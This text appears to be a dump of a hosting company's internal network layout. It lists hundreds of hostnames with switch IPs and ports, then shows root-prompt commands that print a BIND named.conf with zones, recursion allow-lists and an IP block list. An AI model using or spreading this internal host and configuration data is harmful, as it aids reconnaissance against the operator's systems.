img38 10.102.4.241 16
img39 10.102.4.241 17
img40 10.102.4.241 18
img41 10.102.4.241 19
img42 10.102.4.241 20
img43 10.102.4.241 21
img44 10.102.4.241 22
img46 10.102.4.241 24
gsswitch1 10.102.4.242 3
img189 10.102.4.242 4
img190 10.102.4.242 5
img191 10.102.4.242 6
img192 10.102.4.242 7
img193 10.102.4.242 8
img194 10.102.4.242 9
img196 10.102.4.242 12
img197 10.102.4.242 13
img198 10.102.4.242 14
img199 10.102.4.242 15
img200 10.102.4.242 16
img268 10.102.4.242 17
img269 10.102.4.242 18
img720 10.102.4.242 20
img703 10.102.4.242 22
rdaa11 10.101.3.240 2
rdaa12 10.101.3.240 3
rdaa10 10.101.3.240 4
rdju6 10.101.3.240 5
rdac6 10.101.3.240 7
rdac3 10.101.3.240 9
rdac1 10.101.3.240 10
rdju5 10.101.3.240 13
rdaf6 10.101.3.240 14
rdaf8 10.101.3.240 17
rdac5 10.101.3.240 19
rdaa3 10.101.3.240 20
rdac8 10.101.3.240 21
rdad7 10.101.3.240 22
rdad8 10.101.3.240 23
rdju1 10.101.3.241 2
rdju2 10.101.3.241 3
rdaa8 10.101.3.241 5
rdaa9 10.101.3.241 6
rdaa14 10.101.3.241 14
rdaf5 10.101.3.241 17
rdad2 10.101.3.241 18
rdad3 10.101.3.241 19
rdac7 10.101.3.241 20
rdad5 10.101.3.241 21
rdad4 10.101.3.241 22
rdju4 10.101.3.241 23
rdaa2 10.101.3.242 2
rdaa4 10.101.3.242 4
rdaa7 10.101.3.242 5
rdab1 10.101.3.242 6
rdab7 10.101.3.242 7
rdag4 10.101.3.242 17
rdag5 10.101.3.242 18
rdag6 10.101.3.242 19
rdae5 10.101.3.242 20
rdae4 10.101.3.242 22
rdag9 10.101.3.242 23
rdag10 10.101.3.242 24
rdaa1 10.101.3.243 2
rdaa5 10.101.3.243 3
rdaa6 10.101.3.243 4
rdab2 10.101.3.243 5
rdab4 10.101.3.243 7
rdab5 10.101.3.243 8
rdab6 10.101.3.243 9
rdac2 10.101.3.243 10
rdac4 10.101.3.243 11
rdae7 10.101.3.243 13
rdae6 10.101.3.243 14
rdag2 10.101.3.243 17
rdag3 10.101.3.243 18
rdab3 10.101.6.240 5
rdaf3 10.101.6.240 6
rdaf2 10.101.6.240 7
rdae2 10.101.6.240 8
rdaa15 10.101.6.240 9
rdaa16 10.101.6.240 10
rdae3 10.101.6.240 17
rdaf5 10.101.6.240 20
rdag12 10.101.6.240 21
rdad6 10.101.6.240 22
rdaa13 10.101.6.240 23
rdswitch4 10.101.6.240 24
rdaf4 10.101.6.241 6
rdaf1 10.101.6.241 7
rdag11 10.101.6.241 8
rdaf7 10.101.6.241 10
rdaf4 10.101.6.241 11
rdag8 10.101.6.241 16
rdcv1 10.101.6.241 17
img875 10.101.6.241 19
img876 10.101.6.241 20
img877 10.101.6.241 21
img878 10.101.6.241 22
rdswitch5 10.101.6.241 24
mtad1 10.103.1.240 2
img595 10.103.1.240 3
img835 10.103.1.240 4
img836 10.103.1.240 5
img837 10.103.1.240 6
img838 10.103.1.240 7
img642 10.103.1.240 8
img839 10.103.1.240 10
img840 10.103.1.240 11
img841 10.103.1.240 12
img842 10.103.1.240 13
img843 10.103.1.240 14
img801 10.103.1.240 15
img644 10.103.1.240 17
mtae8 10.103.1.240 18
img661 10.103.1.240 19
img664 10.103.1.240 20
img143 10.103.1.240 21
img844 10.103.1.240 22
img834 10.103.1.241 3
img833 10.103.1.241 4
img832 10.103.1.241 5
img831 10.103.1.241 6
img596 10.103.1.241 10
img830 10.103.1.241 11
img829 10.103.1.241 12
img828 10.103.1.241 13
img827 10.103.1.241 14
mtae12 10.103.1.241 15
mtae9 10.103.1.241 16
mtae10 10.103.1.241 17
img695 10.103.1.241 18
img826 10.103.1.241 19
img137 10.103.1.241 20
img825 10.103.1.241 21
mtae13 10.103.1.241 22
mtab1 10.103.1.242 1
mtab2 10.103.1.242 2
mtab3 10.103.1.242 3
mtab4 10.103.1.242 4
mtab5 10.103.1.242 5
mtae14 10.103.1.242 9
mtae15 10.103.1.242 10
img391 10.103.1.242 12
img539 10.103.1.242 14
img818 10.103.1.242 15
img803 10.103.1.242 17
mtae1 10.103.1.242 18
mtae2 10.103.1.242 19
mtae3 10.103.1.242 20
mtae4 10.103.1.242 21
img694 10.103.1.242 22
img708 10.103.1.242 23
mtab6 10.103.1.243 1
mtab7 10.103.1.243 2
mtab8 10.103.1.243 3
mtab9 10.103.1.243 4
mtab10 10.103.1.243 5
img377 10.103.1.243 6
img393 10.103.1.243 7
img392 10.103.1.243 8
img383 10.103.1.243 9
img396 10.103.1.243 10
mtae5 10.103.1.243 11
mtae6 10.103.1.243 12
mtae7 10.103.1.243 13
img397 10.103.1.243 15
img573 10.103.1.243 18
img706 10.103.1.243 19
img163 10.103.1.243 21
img538 10.103.1.243 22
img805 10.103.1.243 23
img387 10.103.1.244 1
img386 10.103.1.244 2
img674 10.103.1.244 3
img669 10.103.1.244 5
img639 10.103.1.244 6
img62 10.103.1.244 7
img641 10.103.1.244 8
img63 10.103.1.244 9
img643 10.103.1.244 10
img64 10.103.1.244 11
img69 10.103.1.244 12
img85 10.103.1.244 13
img94 10.103.1.244 15
img96 10.103.1.244 16
img97 10.103.1.244 17
img651 10.103.1.244 18
img109 10.103.1.244 19
img686 10.103.1.244 20
img121 10.103.1.244 21
img130 10.103.1.244 22
img806 10.103.1.244 23
img702 10.103.1.245 4
img683 10.103.1.245 6
img684 10.103.1.245 7
img593 10.103.1.245 8
img534 10.103.1.245 9
img52 10.103.1.245 10
img535 10.103.1.245 11
img202 10.103.1.245 12
img713 10.103.1.245 14
img908 10.103.1.245 15
img251 10.103.1.245 16
img807 10.103.1.245 17
img804 10.103.1.245 19
img28 10.103.1.245 20
img685 10.103.1.245 21
img59 10.103.1.245 22
img638 10.103.1.245 23
mtac4 10.103.1.246 1
mtac5 10.103.1.246 2
mtac6 10.103.1.246 3
img707 10.103.1.246 5
img682 10.103.1.246 6
img714 10.103.1.246 7
tmp910 10.103.1.246 8
img699 10.103.1.246 10
img688 10.103.1.246 11
img689 10.103.1.246 12
img690 10.103.1.246 13
img717 10.103.1.246 14
img718 10.103.1.246 15
img709 10.103.1.246 18
img710 10.103.1.246 19
img602 10.103.1.246 20
img607 10.103.1.246 21
mtae20 10.103.1.246 23
mtac1 10.103.1.247 1
mtac2 10.103.1.247 2
mtac3 10.103.1.247 3
img701 10.103.1.247 4
tmp911 10.103.1.247 6
img715 10.103.1.247 7
img687 10.103.1.247 8
img704 10.103.1.247 10
img691 10.103.1.247 11
img692 10.103.1.247 12
img716 10.103.1.247 13
img705 10.103.1.247 14
img203 10.103.1.247 19
img700 10.103.1.247 20
img673 10.103.1.247 21
img659 10.103.1.247 23
img560 10.103.1.248 5
img574 10.103.1.248 7
img171 10.103.1.248 8
img577 10.103.1.248 9
img585 10.103.1.248 10
img536 10.103.1.248 13
img540 10.103.1.248 14
mtae16 10.103.1.248 18
mtae11 10.103.1.248 19
img537 10.103.1.248 20
mtae17 10.103.1.248 24
img587 10.103.6.240 1
img588 10.103.6.240 2
img589 10.103.6.240 3
img590 10.103.6.240 4
img591 10.103.6.240 5
img592 10.103.6.240 6
img660 10.103.6.240 7
img90 10.103.6.240 8
img662 10.103.6.240 9
img99 10.103.6.240 10
img510 10.103.6.240 11
img100 10.103.6.240 12
img815 10.103.6.240 13
img743 10.103.6.240 14
img745 10.103.6.240 15
img746 10.103.6.240 16
img142 10.103.6.240 17
img570 10.103.6.240 18
img563 10.103.6.240 19
img559 10.103.6.240 20
img554 10.103.6.240 21
img996 10.103.6.240 22
img89 10.103.6.240 23
img87 10.103.6.240 24
img980 10.103.6.241 2
img72 10.103.6.241 3
img259 10.103.6.241 4
img213 10.103.6.241 5
img136 10.103.6.241 6
img262 10.103.6.241 7
img258 10.103.6.241 8
img252 10.103.6.241 9
img253 10.103.6.241 10
img254 10.103.6.241 11
img255 10.103.6.241 12
img256 10.103.6.241 13
img257 10.103.6.241 14
img263 10.103.6.241 15
img141 10.103.6.241 16
img265 10.103.6.241 17
img249 10.103.6.241 19
img823 10.103.6.241 20
img248 10.103.6.241 21
img406 10.103.6.241 22
img515 10.103.6.241 23
img266 10.103.6.242 2
img444 10.103.6.242 4
img443 10.103.6.242 5
img442 10.103.6.242 6
img441 10.103.6.242 7
img440 10.103.6.242 8
img145 10.103.6.242 9
img412 10.103.6.242 10
img403 10.103.6.242 11
img404 10.103.6.242 12
img405 10.103.6.242 13
img407 10.103.6.242 15
img408 10.103.6.242 16
img201 10.103.6.242 17
img214 10.103.6.242 18
img813 10.103.6.242 19
img1000 10.103.6.242 21
img814 10.103.6.242 22
img824 10.103.6.242 23
img339 10.103.6.243 1
img337 10.103.6.243 2
img207 10.103.6.243 3
img101 10.103.6.243 4
img341 10.103.6.243 5
img187 10.103.6.243 6
img208 10.103.6.243 7
img402 10.103.6.243 9
img340 10.103.6.243 10
img205 10.103.6.243 11
img204 10.103.6.243 12
img502 10.103.6.243 14
img821 10.103.6.243 15
img521 10.103.6.243 17
img411 10.103.6.243 18
img528 10.103.6.243 19
img513 10.103.6.243 20
img822 10.103.6.243 21
img525 10.103.6.244 1
img606 10.103.6.244 2
img994 10.103.6.244 3
img526 10.103.6.244 4
img522 10.103.6.244 6
img511 10.103.6.244 8
img819 10.103.6.244 9
img820 10.103.6.244 10
img291 10.103.6.244 11
img816 10.103.6.244 12
img241 10.103.6.244 13
img508 10.103.6.244 14
img742 10.103.6.244 15
img401 10.103.6.244 20
img267 10.103.6.244 21
img507 10.103.6.244 22
img338 10.103.6.244 23
img532 10.103.6.244 24
img802 10.103.6.245 12
mtaj17 10.103.6.245 13
mtaj16 10.103.6.245 14
mtaj15 10.103.6.245 15
img681 10.103.6.245 17
mtaj14 10.103.6.245 18
mtaj13 10.103.6.245 19
mtaj12 10.103.6.245 20
mtaj11 10.103.6.245 21
img873 10.103.6.245 22
img874 10.103.6.245 23
img857 10.103.6.246 1
img858 10.103.6.246 2
img859 10.103.6.246 3
img860 10.103.6.246 4
img861 10.103.6.246 5
img862 10.103.6.246 6
img863 10.103.6.246 7
img864 10.103.6.246 8
img866 10.103.6.246 10
img867 10.103.6.246 11
img868 10.103.6.246 12
img869 10.103.6.246 13
img870 10.103.6.246 14
img81 10.103.6.246 15
img210 10.103.6.246 17
img211 10.103.6.246 18
img80 10.103.6.246 19
img209 10.103.6.246 20
img555 10.103.6.246 21
img152 10.103.6.246 23
img722 10.103.7.240 13
img654 10.103.7.240 14
img652 10.103.7.240 15
img649 10.103.7.240 16
img657 10.103.7.240 18
img656 10.103.7.240 19
img648 10.103.7.240 20
img646 10.103.7.240 21
img645 10.103.7.240 22
img608 10.103.7.241 1
img610 10.103.7.241 2
img611 10.103.7.241 3
img612 10.103.7.241 4
img733 10.103.7.241 5
img1000 10.103.7.241 14
img851 10.103.7.241 18
img852 10.103.7.241 19
img747 10.103.7.241 20
img975 10.103.7.241 21
img616 10.103.7.241 23
mtag6 10.103.7.242 8
img732 10.103.7.242 11
img855 10.103.7.242 12
img731 10.103.7.242 13
img854 10.103.7.242 14
img729 10.103.7.242 15
img725 10.103.7.242 19
mtag3 10.103.7.242 20
mtju1 10.103.7.242 22
mtju2 10.103.7.242 23
mtju3 10.103.7.242 24
img614 10.103.7.243 2
img615 10.103.7.243 3
mtag20 10.103.7.243 4
mtag6 10.103.7.243 8
img92 10.103.7.243 10
mtag7 10.103.7.243 16
mtag9 10.103.7.243 20
img724 10.103.7.243 21
mtag8 10.103.7.243 23
img542 10.103.7.244 1
img543 10.103.7.244 2
img545 10.103.7.244 3
mtju5 10.103.7.244 4
img576 10.103.7.244 5
img156 10.103.7.244 6
img155 10.103.7.244 7
img152 10.103.7.244 8
img853 10.103.7.244 11
mtju6 10.103.7.244 12
img153 10.103.7.244 13
img146 10.103.7.244 14
img856 10.103.7.244 15
img145 10.103.7.244 16
img148 10.103.7.244 17
img808 10.103.7.244 18
img98 10.103.7.244 19
img541 10.103.7.244 20
img88 10.103.7.244 21
img603 10.103.7.244 22
mtag5 10.103.7.244 23
img547 10.103.7.245 1
img594 10.103.7.245 2
mtju4 10.103.7.245 3
img546 10.103.7.245 4
img542 10.103.7.245 5
mtag11 10.103.7.245 7
mtag2 10.103.7.245 8
img800 10.103.7.245 11
img151 10.103.7.245 12
img812 10.103.7.245 13
img140 10.103.7.245 14
img141 10.103.7.245 15
img811 10.103.7.245 17
img809 10.103.7.245 18
img571 10.103.7.245 19
img810 10.103.7.245 20
img605 10.103.7.245 21
mtag4 10.103.7.245 22
img183 10.103.7.245 23
img135 10.103.7.245 24
img983 10.103.7.246 3
img1 10.103.7.246 4
img217 10.103.7.246 6
mtag12 10.103.7.246 8
img719 10.103.7.246 9
img233 10.103.7.246 10
img228 10.103.7.246 11
img227 10.103.7.246 12
img848 10.103.7.246 13
img849 10.103.7.246 14
img850 10.103.7.246 15
img744 10.103.7.246 16
img219 10.103.7.246 17
img218 10.103.7.246 18
img221 10.103.7.246 20
img222 10.103.7.246 21
img974 10.103.7.246 22
img976 10.103.7.246 23
img232 10.103.7.247 5
img166 10.103.7.247 6
img220 10.103.7.247 10
img231 10.103.7.247 13
img215 10.103.7.247 14
img997 10.103.7.247 15
img845 10.103.7.247 17
img846 10.103.7.247 18
img847 10.103.7.247 19
img225 10.103.7.247 21
img218 10.103.7.247 22
img667 10.103.7.247 23
mtag28 10.103.7.248 1
mtag19 10.103.7.248 7
mtag18 10.103.7.248 8
mtag25 10.103.7.248 9
mtag26 10.103.7.248 10
mtag27 10.103.7.248 11
mtag21 10.103.7.248 12
mtag22 10.103.7.248 13
mtag23 10.103.7.248 14
mtag24 10.103.7.248 15
img734 10.103.7.248 17
img737 10.103.7.248 18
img741 10.103.7.248 19
img739 10.103.7.248 20
img735 10.103.7.248 21
img736 10.103.7.248 22
img738 10.103.7.248 23
img740 10.103.7.248 24
img51 10.102.1.243 1
img188 10.102.1.243 2
gsju5 10.102.1.243 3
img195 10.102.1.243 10
img10 10.102.1.243 11
img8 10.102.1.243 12
img6 10.102.1.243 13
img4 10.102.1.243 14
img624 10.102.1.243 15
img626 10.102.1.243 16
gsju4 10.102.1.243 17
img630 10.102.1.243 18
img632 10.102.1.243 19
img633 10.102.1.243 20
img635 10.102.1.243 21
img622 10.102.1.243 23
gsswitch2 10.102.1.243 24
# ls -alt /etc/named.conf
lrwxrwxrwx 1 root root 53 Apr 15 2011 /etc/named.conf -> /home/image/svn/co
nfig/dns/external-master.named.conf
# ls -alt /home/image/svn/config/dns/
total 92
drwxrwxrwx 50 image image 4096 May 24 17:44 ..
-rw-rw-r-- 1 image image 33693 Feb 3 2012 external-master.named.conf
-rwxrwxr-x 1 image image 37658 Nov 29 2011 external-slave.named.conf
-rwxrwxr-x 1 image image 2285 Nov 29 2011 internal-slave.named.conf
drwxrwxrwx 2 image image 4096 Mar 22 2011 .
-rwxrwxr-x 1 image image 931 Mar 22 2011 caching-fe.named.conf
# cat /home/image/svn/config/dns/external-master.named.conf
options {
directory "/var/named";
/*
* If there is a firewall between you and nameservers you want
* to talk to, you might need to uncomment the query-source
* directive below. Previous versions of BIND always asked
* questions using port 53, but BIND 8.1 uses an unprivileged
* port by default.
*/
// query-source address * port 53;
# recursion no;
allow-recursion { 127.0.0.1 ; 38.99.77.75; 208.94.0.78; } ;
# allow-recursion { none ; } ;
version "[Secured]";
minimal-responses yes;
additional-from-auth no;
additional-from-cache no;
blackhole { blacklist; };
};
logging{
category lame-servers{ null; };
channel simple_log {
file "/var/log/named/dns.log" versions 3 size 5m;
severity info;
print-time yes;
print-severity yes;
print-category yes;
};
category default{
simple_log;
};
};
include "/etc/rndc.key";
view "default" {
match-clients { any; };
zone "phiom.com" {
type master;
file "/var/named/phiom.com.db";
};
zone "ezrinet.com" {
type master;
file "/var/named/ezrinet.com.db";
};
zone "imageshack.us" {
type master;
file "/var/named/master/imageshack.us.external.static.db";
};
zone "imageshack.net" {
type master;
file "/var/named/imageshack.net.db";
};
zone "imageshack.com" {
type master;
file "/var/named/master/db.imageshack.com";
};
zone "imageshack.com.au" {
type master;
file "/var/named/imageshack.com.au.db";
};
zone "fro.gy" {
type master;
file "/var/named/master/fro.gy.db";
};
zone "yfrog.net" {
type master;
file "/var/named/master/yfrog.db";
};
zone "yfrog.com" {
type master;
file "/var/named/master/yfrog.db";
};
zone "yfrog.us" {
type master;
file "/var/named/master/yfrog.db";
};
zone "yfrog.es" {
type master;
file "/var/named/master/yfrog.db";
};
zone "yfrog.ru" {
type master;
file "/var/named/master/yfrog.db";
};
zone "yfrog.com.tr" {
type master;
file "/var/named/master/yfrog.db";
};
zone "yfrog.it" {
type master;
file "/var/named/master/yfrog.db";
};
zone "yfrog.fr" {
type master;
file "/var/named/master/yfrog.db";
};
zone "yfrog.co.il" {
type master;
file "/var/named/master/yfrog.db";
};
zone "yfrog.co.uk" {
type master;
file "/var/named/master/yfrog.db";
};
zone "yfrog.com.pl" {
type master;
file "/var/named/master/yfrog.db";
};
zone "yfrog.pl" {
type master;
file "/var/named/master/yfrog.db";
};
zone "yfrog.eu" {
type master;
file "/var/named/master/yfrog.db";
};
zone "calibri.net" {
type master;
file "/var/named/calibri.net.db";
};
zone "yulia.com" {
type master;
file "/var/named/yulia.com.db";
};
zone "exs.cx" {
type master;
file "/var/named/exs.cx.db";
};
zone "echo.cx" {
type master;
file "/var/named/echo.cx.db";
};
zone "imageshack.ws" {
type master;
file "/var/named/imageshack.ws.db";
};
zone "99.38.in-addr.arpa" in {
type master ;
file "/var/named/master/reverse/99.38.in-addr.arpa";
};
zone "94.208.in-addr.arpa" in {
type master ;
file "/var/named/master/reverse/94.208.in-addr.arpa";
};
zone "10.in-addr.arpa" in {
type master ;
file "/var/named/master/reverse/10.in-addr.arpa";
};
};
acl blacklist {
1.12.0.0/14;
1.24.0.0/13;
1.45.0.0/16;
1.48.0.0/15;
1.50.0.0/16;
1.51.0.0/16;
1.56.0.0/13;
1.68.0.0/14;
1.80.0.0/13;
1.88.0.0/14;
1.92.0.0/15;
1.94.0.0/15;
1.116.0.0/14;
1.180.0.0/14;
1.184.0.0/15;
1.188.0.0/14;
1.192.0.0/13;
1.202.0.0/15;
1.204.0.0/14;
14.16.0.0/12;
14.102.156.0/22;
14.103.0.0/16;
14.104.0.0/13;
14.112.0.0/12;
14.130.0.0/15;
14.134.0.0/15;
14.144.0.0/12;
14.192.60.0/22;
14.196.0.0/15;
14.204.0.0/15;
14.208.0.0/12;
27.8.0.0/13;
27.16.0.0/12;
27.36.0.0/14;
27.40.0.0/13;
27.50.128.0/17;
27.54.192.0/18;
27.98.208.0/20;
27.98.224.0/19;
27.99.128.0/17;
27.100.36.0/22;
27.103.0.0/16;
27.106.128.0/18;
27.112.0.0/18;
27.112.80.0/20;
27.113.128.0/18;
27.115.0.0/17;
27.116.44.0/22;
27.128.0.0/15;
27.131.220.0/22;
27.144.0.0/16;
27.148.0.0/14;
27.152.0.0/13;
27.184.0.0/13;
27.192.0.0/11;
27.224.0.0/14;
36.0.8.0/21;
36.1.0.0/16;
36.4.0.0/14;
36.16.0.0/12;
36.32.0.0/14;
36.36.0.0/16;
36.40.0.0/13;
36.48.0.0/15;
36.51.0.0/16;
36.56.0.0/13;
36.96.0.0/11;
36.128.0.0/10;
36.192.0.0/11;
36.248.0.0/14;
36.254.0.0/16;
42.51.0.0/16;
42.63.0.0/16;
42.88.0.0/13;
42.97.0.0/16;
42.128.0.0/12;
42.160.0.0/12;
42.208.0.0/12;
42.224.0.0/12;
49.4.0.0/14;
49.52.0.0/14;
49.64.0.0/11;
49.112.0.0/13;
49.120.0.0/14;
49.140.0.0/15;
49.152.0.0/14;
49.208.0.0/15;
49.210.0.0/15;
49.220.0.0/14;
49.232.0.0/14;
49.239.0.0/18;
49.239.192.0/18;
49.246.224.0/19;
58.14.0.0/15;
58.16.0.0/16;
58.17.0.0/17;
58.17.128.0/17;
58.18.0.0/16;
58.19.0.0/16;
58.20.0.0/16;
58.21.0.0/16;
58.22.0.0/15;
58.24.0.0/15;
58.30.0.0/15;
58.32.0.0/13;
58.40.0.0/15;
58.42.0.0/16;
58.43.0.0/16;
58.44.0.0/14;
58.48.0.0/13;
58.56.0.0/15;
58.58.0.0/16;
58.59.0.0/17;
58.59.128.0/17;
58.60.0.0/14;
58.66.0.0/15;
58.68.128.0/17;
58.82.0.0/15;
58.87.64.0/18;
58.99.128.0/17;
58.100.0.0/15;
58.116.0.0/14;
58.128.0.0/13;
58.144.0.0/16;
58.154.0.0/15;
58.192.0.0/15;
58.194.0.0/15;
58.196.0.0/15;
58.198.0.0/15;
58.200.0.0/13;
58.208.0.0/12;
58.240.0.0/15;
58.242.0.0/15;
58.244.0.0/15;
58.246.0.0/15;
58.248.0.0/13;
59.32.0.0/13;
59.40.0.0/15;
59.42.0.0/16;
59.43.0.0/16;
59.44.0.0/14;
59.48.0.0/16;
59.49.0.0/17;
59.49.128.0/17;
59.50.0.0/16;
59.51.0.0/17;
59.51.128.0/17;
59.52.0.0/14;
59.56.0.0/14;
59.60.0.0/15;
59.62.0.0/15;
59.64.0.0/14;
59.68.0.0/14;
59.72.0.0/15;
59.74.0.0/15;
59.76.0.0/16;
59.77.0.0/16;
59.78.0.0/15;
59.80.0.0/14;
59.107.0.0/17;
59.107.128.0/17;
59.108.0.0/15;
59.110.0.0/15;
59.151.0.0/17;
59.155.0.0/16;
59.172.0.0/15;
59.174.0.0/15;
59.191.0.0/17;
59.191.240.0/20;
59.192.0.0/10;
60.0.0.0/13;
60.8.0.0/15;
60.10.0.0/16;
60.11.0.0/16;
60.12.0.0/16;
60.13.0.0/18;
60.13.64.0/18;
60.13.128.0/17;
60.14.0.0/15;
60.16.0.0/13;
60.24.0.0/14;
60.28.0.0/15;
60.30.0.0/16;
60.31.0.0/16;
60.55.0.0/16;
60.63.0.0/16;
60.160.0.0/15;
60.162.0.0/15;
60.164.0.0/15;
60.166.0.0/15;
60.168.0.0/13;
60.176.0.0/12;
60.194.0.0/15;
60.200.0.0/14;
60.204.0.0/16;
60.205.0.0/16;
60.206.0.0/15;
60.208.0.0/13;
60.216.0.0/15;
60.218.0.0/15;
60.220.0.0/14;
60.232.0.0/15;
60.235.0.0/16;
60.245.128.0/17;
60.247.0.0/16;
60.252.0.0/16;
60.253.128.0/17;
60.255.0.0/16;
61.4.80.0/22;
61.4.176.0/20;
61.8.160.0/20;
61.28.0.0/20;
61.28.16.0/20;
61.28.32.0/19;
61.28.64.0/18;
61.29.128.0/18;
61.29.192.0/19;
61.29.224.0/20;
61.29.240.0/20;
61.45.128.0/18;
61.47.128.0/18;
61.48.0.0/14;
61.52.0.0/15;
61.54.0.0/16;
61.55.0.0/16;
61.87.192.0/18;
61.128.0.0/15;
61.130.0.0/15;
61.132.0.0/16;
61.133.0.0/17;
61.133.128.0/17;
61.134.0.0/18;
61.134.64.0/19;
61.134.96.0/19;
61.134.128.0/18;
61.134.192.0/18;
61.135.0.0/16;
61.136.0.0/18;
61.136.64.0/18;
61.136.128.0/17;
61.137.0.0/17;
61.137.128.0/17;
61.138.0.0/18;
61.138.64.0/18;
61.138.128.0/18;
61.138.192.0/18;
61.139.0.0/17;
61.139.128.0/18;
61.139.192.0/18;
61.140.0.0/14;
61.144.0.0/14;
61.148.0.0/15;
61.150.0.0/15;
61.152.0.0/16;
61.153.0.0/16;
61.154.0.0/15;
61.156.0.0/16;
61.157.0.0/16;
61.158.0.0/17;
61.158.128.0/17;
61.159.0.0/18;
61.159.64.0/18;
61.159.128.0/17;
61.160.0.0/16;
61.161.0.0/18;
61.161.64.0/18;
61.161.128.0/17;
61.162.0.0/16;
61.163.0.0/16;
61.164.0.0/16;
61.165.0.0/16;
61.166.0.0/16;
61.167.0.0/16;
61.168.0.0/16;
61.169.0.0/16;
61.170.0.0/15;
61.172.0.0/14;
61.176.0.0/16;
61.177.0.0/16;
61.178.0.0/16;
61.179.0.0/16;
61.180.0.0/17;
61.180.128.0/17;
61.181.0.0/16;
61.182.0.0/16;
61.183.0.0/16;
61.184.0.0/14;
61.188.0.0/16;
61.189.0.0/17;
61.189.128.0/17;
61.190.0.0/15;
61.232.0.0/14;
61.236.0.0/15;
61.240.0.0/14;
101.4.0.0/14;
101.16.0.0/12;
101.32.0.0/12;
101.48.0.0/15;
101.52.0.0/16;
101.54.0.0/16;
101.64.0.0/13;
101.72.0.0/14;
101.76.0.0/15;
101.80.0.0/12;
101.104.0.0/14;
101.120.0.0/14;
101.124.0.0/15;
101.126.0.0/16;
101.129.0.0/16;
101.130.0.0/15;
101.132.0.0/14;
101.144.0.0/12;
101.192.0.0/14;
101.196.0.0/14;
101.200.0.0/15;
101.204.0.0/14;
101.224.0.0/13;
101.232.0.0/15;
101.236.0.0/14;
101.240.0.0/14;
101.244.0.0/14;
101.248.0.0/15;
101.252.0.0/15;
101.254.0.0/16;
110.6.0.0/15;
110.16.0.0/14;
110.40.0.0/14;
110.48.0.0/16;
110.51.0.0/16;
110.52.0.0/15;
110.56.0.0/13;
110.64.0.0/15;
110.72.0.0/15;
110.75.0.0/17;
110.75.128.0/19;
110.75.160.0/19;
110.75.192.0/18;
110.76.0.0/19;
110.76.32.0/19;
110.76.192.0/18;
110.77.0.0/17;
110.80.0.0/13;
110.88.0.0/14;
110.94.0.0/15;
110.96.0.0/11;
110.152.0.0/14;
110.156.0.0/15;
110.165.32.0/19;
110.166.0.0/15;
110.172.192.0/18;
110.173.0.0/19;
110.173.32.0/20;
110.173.96.0/19;
110.173.192.0/19;
110.176.0.0/13;
110.184.0.0/13;
110.192.0.0/11;
110.228.0.0/14;
110.232.32.0/19;
110.236.0.0/15;
110.240.0.0/12;
111.0.0.0/10;
111.66.0.0/16;
111.67.192.0/20;
111.68.64.0/19;
111.72.0.0/13;
111.85.0.0/16;
111.91.192.0/19;
111.112.0.0/15;
111.114.0.0/15;
111.116.0.0/15;
111.119.64.0/18;
111.119.128.0/19;
111.120.0.0/14;
111.124.0.0/16;
111.126.0.0/15;
111.128.0.0/11;
111.160.0.0/13;
111.170.0.0/16;
111.172.0.0/14;
111.176.0.0/13;
111.186.0.0/15;
111.192.0.0/12;
111.208.0.0/14;
111.212.0.0/14;
111.221.128.0/17;
111.222.0.0/16;
111.223.240.0/22;
111.223.248.0/22;
111.224.0.0/14;
111.228.0.0/14;
111.235.96.0/19;
111.235.160.0/19;
112.0.0.0/10;
112.64.0.0/15;
112.66.0.0/15;
112.73.0.0/16;
112.74.0.0/15;
112.80.0.0/13;
112.88.0.0/13;
112.96.0.0/15;
112.98.0.0/15;
112.100.0.0/14;
112.109.128.0/17;
112.111.0.0/16;
112.112.0.0/14;
112.116.0.0/15;
112.122.0.0/15;
112.124.0.0/14;
112.128.0.0/14;
112.132.0.0/16;
112.192.0.0/14;
112.224.0.0/11;
113.0.0.0/13;
113.8.0.0/15;
113.11.192.0/19;
113.12.0.0/14;
113.16.0.0/15;
113.18.0.0/16;
113.24.0.0/14;
113.31.0.0/16;
113.44.0.0/14;
113.48.0.0/14;
113.52.160.0/19;
113.54.0.0/15;
113.56.0.0/15;
113.58.0.0/16;
113.59.0.0/17;
113.62.0.0/15;
113.64.0.0/11;
113.96.0.0/12;
113.112.0.0/13;
113.120.0.0/13;
113.128.0.0/15;
113.130.96.0/20;
113.130.112.0/21;
113.132.0.0/14;
113.136.0.0/13;
113.194.0.0/15;
113.197.100.0/22;
113.200.0.0/15;
113.202.0.0/16;
113.204.0.0/14;
113.208.96.0/19;
113.208.128.0/17;
113.209.0.0/16;
113.212.0.0/18;
113.212.100.0/22;
113.213.0.0/17;
113.214.0.0/15;
113.218.0.0/15;
113.220.0.0/14;
113.224.0.0/12;
113.240.0.0/13;
113.248.0.0/14;
114.28.0.0/16;
114.54.0.0/15;
114.60.0.0/14;
114.64.0.0/14;
114.68.0.0/16;
114.80.0.0/12;
114.96.0.0/13;
114.104.0.0/14;
114.110.0.0/20;
114.110.64.0/18;
114.111.0.0/19;
114.111.160.0/19;
114.112.0.0/14;
114.116.0.0/15;
114.118.0.0/15;
114.132.0.0/16;
114.135.0.0/16;
114.138.0.0/15;
114.141.128.0/18;
114.196.0.0/15;
114.208.0.0/14;
114.212.0.0/15;
114.214.0.0/16;
114.215.0.0/16;
114.216.0.0/13;
114.224.0.0/12;
114.240.0.0/12;
115.24.0.0/14;
115.28.0.0/15;
115.32.0.0/14;
115.44.0.0/15;
115.46.0.0/16;
115.47.0.0/16;
115.48.0.0/12;
115.84.0.0/18;
115.84.192.0/19;
115.85.192.0/18;
115.100.0.0/14;
115.104.0.0/14;
115.120.0.0/14;
115.124.16.0/20;
115.148.0.0/14;
115.152.0.0/15;
115.154.0.0/15;
115.156.0.0/15;
115.158.0.0/16;
115.159.0.0/16;
115.168.0.0/14;
115.172.0.0/14;
115.180.0.0/14;
115.190.0.0/15;
115.192.0.0/11;
115.224.0.0/12;
116.1.0.0/16;
116.2.0.0/15;
116.4.0.0/14;
116.8.0.0/14;
116.13.0.0/16;
116.16.0.0/12;
116.52.0.0/14;
116.56.0.0/15;
116.58.128.0/20;
116.58.208.0/20;
116.60.0.0/14;
116.66.0.0/17;
116.69.0.0/16;
116.70.0.0/17;
116.76.0.0/15;
116.78.0.0/15;
116.85.0.0/16;
116.89.144.0/20;
116.90.80.0/20;
116.90.184.0/21;
116.95.0.0/16;
116.112.0.0/14;
116.116.0.0/15;
116.128.0.0/10;
116.192.0.0/16;
116.193.16.0/20;
116.193.32.0/19;
116.194.0.0/15;
116.196.0.0/16;
116.198.0.0/16;
116.199.0.0/17;
116.199.128.0/19;
116.204.0.0/15;
116.207.0.0/16;
116.208.0.0/14;
116.212.160.0/20;
116.213.64.0/18;
